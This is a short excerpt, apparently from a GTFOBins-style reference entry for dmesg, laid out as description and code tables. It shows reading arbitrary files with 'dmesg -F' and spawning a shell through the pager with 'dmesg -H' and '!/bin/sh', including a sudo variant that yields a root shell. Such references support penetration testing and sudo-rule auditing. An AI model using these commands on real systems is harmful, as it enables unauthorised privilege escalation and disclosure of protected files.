| code |
| LFILE=file_to_read
dmesg -F "$LFILE"
|
|
|
| description |
code |
| This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. |
dmesg -H
!/bin/sh
|
|
|
| description |
code |
| This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. |
sudo dmesg -H
!/bin/sh
|
|
|